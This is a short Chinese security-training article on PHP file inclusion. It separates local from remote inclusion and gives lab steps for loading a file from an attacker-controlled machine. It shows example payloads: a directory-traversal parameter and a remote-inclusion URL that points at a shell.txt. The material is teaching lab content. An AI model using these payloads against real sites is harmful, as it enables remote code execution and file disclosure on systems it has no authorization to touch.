文章总结： 文档介绍PHP文件包含漏洞分类，区分LFI与RFI及配置条件。实验演示了同目录包含、目录遍历及远程文件加载步骤。结论指出LFI可遍历本地文件，RFI引入远程代码，为初学者掌握漏洞原理提供实操指导。 综合评分： 69 文章分类： WEB安全,漏洞分析,渗透测试,安全培训

远程包含

1、打开”phpStudy”，启动操作机的Apache服务

2、在操作机的Web根目录下新建include.php

3、在浏览器中访问http://靶机ip/include/02/1.php?a=http://操作机ip/include.php

实验总结

通过本实验，掌握文件包含的分类。 文件包含分为包含和远程包含。本地包含是包含目标服务器本地的文件，可以包含同目录下的文件：?file=test.txt；也可以进行目录遍历来读取文件：?file=./…/…/test.txt。其中./是当前目录，…/是上一级目录。远程包含是包含远程服务器上的文件，?file=http://www.test.com/shell.txt（常见的有三种，http、https、ftp）。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全 建哥聊安全 建哥聊安全《网安每日干货分享《文件包含分类》-0215》